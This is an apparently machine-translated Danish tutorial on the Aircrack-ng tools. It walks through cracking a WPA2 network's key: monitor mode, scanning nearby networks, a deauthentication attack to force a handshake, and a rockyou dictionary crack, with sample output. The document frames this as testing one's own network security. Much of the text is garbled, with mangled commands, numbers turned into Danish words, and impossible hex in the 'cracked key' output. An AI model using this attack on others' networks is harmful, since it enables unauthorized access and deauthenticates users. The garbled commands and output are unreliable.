Sådan bruges Aircrack-ng

How Use Aircrack Ng



For det meste tænker folk aldrig på det netværk, de er forbundet til. De tænker aldrig på, hvor sikkert det netværk er, og hvor meget de dagligt risikerer deres fortrolige data. Du kan køre sårbarhedstjek på dine wifi -netværk ved hjælp af et meget kraftfuldt værktøj kaldet Aircrack-ng og Wireshark. Wireshark bruges til at overvåge netværksaktivitet. Aircrack-ng ligner mere et aggressivt værktøj, der lader dig hacke og give adgang til trådløse forbindelser. At tænke som en ubuden gæst har altid været den sikreste måde at beskytte dig selv mod et hack. Du kan muligvis forstå de nøjagtige handlinger, som en ubuden gæst vil tage for at få adgang til dit system ved at lære om aircrack. Du kan derefter foretage overensstemmelseskontrol på dit eget system for at sikre, at det ikke er utrygt.

Aircrack-ng er et komplet sæt software designet til at teste WiFi -netværkssikkerhed. Det er ikke bare et enkelt værktøj, men en samling værktøjer, der hver især udfører et bestemt formål. Der kan arbejdes med forskellige områder af wifi -sikkerhed, f.eks. Overvågning af adgangspunktet, test, angreb på netværket, krakning af wifi -netværket og test af det. Aircracks vigtigste mål er at opsnappe pakkerne og dechiffrere hash for at bryde adgangskoderne. Det understøtter næsten alle de nye trådløse grænseflader. Aircrack-ng er en forbedret version af en forældet værktøjspakke Aircrack, ng refererer til Ny generation . Nogle af de fantastiske værktøjer, der arbejder sammen om at løse en større opgave.







Airmon:

Airmon-ng er inkluderet i aircrack-ng-sættet, der placerer netværkskortet i monitor-tilstand. Netværkskort accepterer normalt kun pakker, der er målrettet dem som defineret af NIC's MAC-adresse, men med airmon-ng accepteres alle trådløse pakker, uanset om de er målrettet mod dem eller ej. Du bør være i stand til at fange disse pakker uden at linke eller godkende til adgangspunktet. Det bruges til at kontrollere status for et adgangspunkt ved at sætte netværksgrænsefladen i skærmtilstand. For det første skal man konfigurere de trådløse kort til at tænde skærmtilstanden og derefter dræbe alle baggrundsprocesserne, hvis man tror, ​​at en proces forstyrrer det. Efter afslutning af processerne kan skærmtilstand aktiveres på det trådløse interface ved at køre kommandoen herunder:



[e -mail beskyttet]: ~ $sudoairmon-ng start wlan0#

Du kan også deaktivere skærmtilstanden ved at stoppe airmon-ng når som helst ved at bruge kommandoen herunder:

[e -mail beskyttet]: ~ $sudoairmon-ng stop wlan0#

Airodump:

Airodump-ng bruges til at liste alle netværk omkring os og til at se værdifuld information om dem. Den grundlæggende funktionalitet for airodump-ng er at snuse pakker, så det er i det væsentlige programmeret til at gribe alle pakkerne omkring os, mens de sættes i monitor-tilstand. Vi vil køre det mod alle forbindelser omkring os og indsamle data som antallet af klienter, der er forbundet til netværket, deres tilsvarende mac -adresser, krypteringsstil og kanalnavne og derefter begynde at målrette mod vores målnetværk.

Ved at skrive kommandoen airodump-ng og give det netværksinterfacenavnet som parameter, kan vi aktivere dette værktøj. Det viser alle adgangspunkter, mængden af ​​datapakker, krypterings- og godkendelsesmetoder, der bruges, og navnet på netværket (ESSID). Fra et hackingssynspunkt er mac -adresserne de vigtigste felter.

[e -mail beskyttet]: ~ $sudoairodump-ng wlx0mon

Aircrack:

Aircrack bruges til cracking af adgangskoder. Efter at have fanget alle pakkerne ved hjælp af airodump, kan vi knække nøglen ved luftrække. Det revner disse nøgler ved hjælp af to metoder PTW og FMS. PTW -tilgang udføres i to faser. Først bruges kun ARP -pakkerne, og først derefter, hvis nøglen ikke er revnet efter søgningen, bruger den alle de andre fangede pakker. Et pluspunkt ved PTW -tilgangen er, at ikke alle pakker bruges til revnedannelse. I den anden tilgang, dvs. FMS, bruger vi både de statistiske modeller og brute force -algerne til at knække nøglen. En ordbogsmetode kan også bruges.

Luftspil:

Airplay-ng introducerer pakker til et trådløst netværk for at skabe eller fremskynde trafik. Pakker fra to forskellige kilder kan fanges af airplay-ng. Den første er det levende netværk, og den anden er pakkerne fra den allerede eksisterende pcap -fil. Airplay-ng er nyttig under et deautentificeringsangreb, der er målrettet mod et trådløst adgangspunkt og en bruger. Desuden kan du udføre nogle angreb som kaffe latte-angreb med airplay-ng, et værktøj, der giver dig mulighed for at få en nøgle fra klientens system. Du kan opnå dette ved at fange en ARP -pakke og derefter manipulere den og sende den tilbage til systemet. Klienten vil derefter oprette en pakke, der kan fanges af airodump og aircrack revner nøglen fra den ændrede pakke. Nogle andre angrebsmuligheder for airplay-ng omfatter chopchop, fragment er præplay osv.

Luftbase:

Airbase-ng bruges til at transformere en ubuden gæstes computer til et kompromitteret forbindelsespunkt, som andre kan linke til. Ved hjælp af Airbase-ng kan du hævde at være et lovligt adgangspunkt og udføre man-in-the-middle-angreb på computere, der er knyttet til dit netværk. Den slags angreb kaldes onde tvillingeangreb. Det er umuligt for grundlæggende brugere at skelne mellem et lovligt adgangspunkt og et falsk adgangspunkt. Så den onde tvillingetrussel er blandt de mest truende trådløse trusler, vi står over for i dag.

Airolib-ng:

Airolib fremskynder hackingsprocessen ved at gemme og administrere adgangskodelisterne og adgangspunktet. Databasestyringssystemet, der bruges af dette program, er SQLite3, som for det meste er tilgængeligt på alle platforme. Adgangskodeknækning omfatter beregning af den parvise hovednøgle, gennem hvilken den private forbigående nøgle (PTK) ekstraheres. Ved hjælp af PTK kan du bestemme rammemeddelelsens identifikationskode (MIC) for en given pakke og teoretisk finde MIC'en til at ligne pakken, så hvis PTK havde ret, havde PMK også ret.

For at se adgangskodelister og adgang til netværk, der er gemt i databasen, skal du indtaste følgende kommando:

[e -mail beskyttet]: ~ $sudoairolib-ng testdatabase –statistik

Her er testdatabase det db, du vil have adgang til eller oprette, og –stats er den handling, du vil udføre på den. Du kan udføre flere operationer på databasefelterne, f.eks. Ved at give maksimal prioritet til noget SSID eller noget. Hvis du vil bruge airolib-ng med aircrack-ng, skal du indtaste følgende kommando:

[e -mail beskyttet]: ~ $sudoaircrack-ng-rtestdatabase wpa2.eapol.cap

Her bruger vi de allerede beregnede PMK'er, der er gemt i testdatabase for at fremskynde processen med cracking af adgangskoder.

Revner WPA/WPA2 ved hjælp af Aircrack-ng:

Lad os se på et lille eksempel på, hvad aircrack-ng kan gøre ved hjælp af et par af dets fantastiske værktøjer. Vi vil knække et WPA/WPA2-netværks foruddelte nøgle ved hjælp af en ordbogsmetode.

Den første ting, vi skal gøre, er at liste netværksgrænseflader op, der understøtter skærmtilstand. Dette kan gøres ved hjælp af følgende kommando:

[e -mail beskyttet]: ~ $sudoairmon-ng

PHY Interface Driver Chipsæt

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Vi kan se en grænseflade; nu skal vi sætte netværksgrænsefladen, vi har fundet (wlx0) i skærmtilstand ved hjælp af følgende kommando:

[e -mail beskyttet]: ~ $sudoairmon-ng start wlx0

Det har aktiveret skærmtilstand på det kaldte interface wlx0mon .

Nu skal vi begynde at lytte til udsendelser fra routere i nærheden via vores netværksgrænseflade, vi har sat i skærmtilstand.

[e -mail beskyttet]: ~ $sudoairodump-ng wlx0mon

CH5 ][Forløbet:30s][ 2020-12-02 00:17



BSSID PWR Beacons#Data, #/s CH MB ENC CIPHER AUTH ESSID



E4: 6F:13: 04: CE:31 -Fire. Fem 62 27 0 154e WPA2 CCMP PSK CrackIt

C4: E9:84:76:10:VÆRE-63 77 0 0 654e. WPA2 CCMP PSK Hackme

C8: 3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74: GIVER:88: FA:38: 02-68 28 2 0 elleve54e WPA2 CCMP PSK TP-Link_3802



BSSID STATION PWR Rate Lost Frames Probe



E4: 6F:13: 04: CE:315C: 3A:Fire. Fem: D7: EA: 8B -3 0- 1e8 5

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -331e- 6e0 3

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -35 0-1 0 6

E4: 6F:13: 04: CE:31BC:91: B5: F8: 7E: D5 -390e-1 1002 13

Vores målnetværk er Crackit i dette tilfælde, som i øjeblikket kører på kanal 1.

Her for at knække adgangskoden til målnetværket skal vi fange et 4-vejs håndtryk, som sker, når en enhed forsøger at oprette forbindelse til et netværk. Vi kan fange det ved at bruge følgende kommando:

[e -mail beskyttet]: ~ $sudoairodump-ng-c 1--bssid E4: 6F:13: 04: CE:31 -i /hjem wlx0

-c : Kanal

–Bss : Bssid for målnetværket

-i : Navnet på det bibliotek, hvor pcap -filen skal placeres

Nu må vi vente på, at en enhed opretter forbindelse til netværket, men der er en bedre måde at fange et håndtryk på. Vi kan deauthentificere enhederne til AP ved hjælp af et deauthentication -angreb ved hjælp af følgende kommando:

[e -mail beskyttet]: ~ $sudoluftspil-ng-0 -tilE4: 6F:13: 04: CE:31

til : Bssid for målnetværket

-0 : deauthentication angreb

Vi har afbrudt alle enhederne, og nu skal vi vente på, at en enhed opretter forbindelse til netværket.

CH1 ][Forløbet:30s][ 2020-12-02 00:02][WPA håndtryk: E4: 6F:13: 04: CE:31



BSSID PWR RXQ Beacons#Data, #/s CH MB ENC CIPHER AUTH E



E4: 6F:13: 04: CE:31 -47 1 228 807 36 154. WPA2 CCMP PSK P



BSSID STATION PWR Rate Lost Frames Probe



E4: 6F:13: 04: CE:31BC:91: B5: F8: 7E: D5 -35 0-1 0 1

E4: 6F:13: 04: CE:315C: 3A:Fire. Fem: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: CE:31 88:28: B3:30:27: 7E -310e-1 0 32

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -350e- 6e263 708CrackIt

E4: 6F:13: 04: CE:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -37 0- 1e0 1

Vi fik et hit, og ved at se i øverste højre hjørne lige ved siden af ​​tiden, kan vi se, at et håndtryk er blevet fanget. Se nu i den angivne mappe ( /hjem i vores tilfælde) for a .pcap fil.

For at knække WPA -nøglen kan vi bruge følgende kommando:

[e -mail beskyttet]: ~ $sudoaircrack-ng-a2 -irockyou.txt-bE4: 6F:13: 04: CE:31håndtryk. cap

b: Bssid for målnetværket

-a2: WPA2 -tilstand

Rockyou.txt: OrdbogenfilBrugt

Handshake.cap: Thefil hvilkenindeholder fanget håndtryk

Aircrack-ng1.2beta3

[00:01:49] 10566nøgler testet(1017,96til/s)

Nøgle fundet! [du fik mig]

Master Key: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6FhalvtredsC


Transient Key: 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6FhalvtredsC025 62E9 5D71

Nøglen til vores målnetværk er krakket med succes.

Konklusion:

Trådløse netværk er overalt og bruges af hver virksomhed, lige fra arbejdere, der bruger smartphones til industrielle styreenheder. Ifølge forskning vil næsten over 50 procent af internettrafikken være over WiFi i 2021. Trådløse netværk har mange fordele, kommunikation uden for døre, hurtig internetadgang på steder, hvor det er næsten umuligt at lægge ledninger, kan udvide netværket uden at installere kabler for enhver anden bruger og kan nemt forbinde dine mobile enheder til dine hjemmekontorer, mens du ikke er der.

På trods af disse fordele er der et stort spørgsmålstegn om dit privatliv og sikkerhed. Som disse netværk; inden for sendeområdet for routere er åbne for alle, de kan let blive angrebet, og dine data kan let blive kompromitteret. For eksempel, hvis du er forbundet til noget offentligt wifi, kan alle, der er forbundet til det netværk, let kontrollere din netværkstrafik ved hjælp af en vis intelligens og ved hjælp af fantastiske tilgængelige værktøjer og endda dumpe den.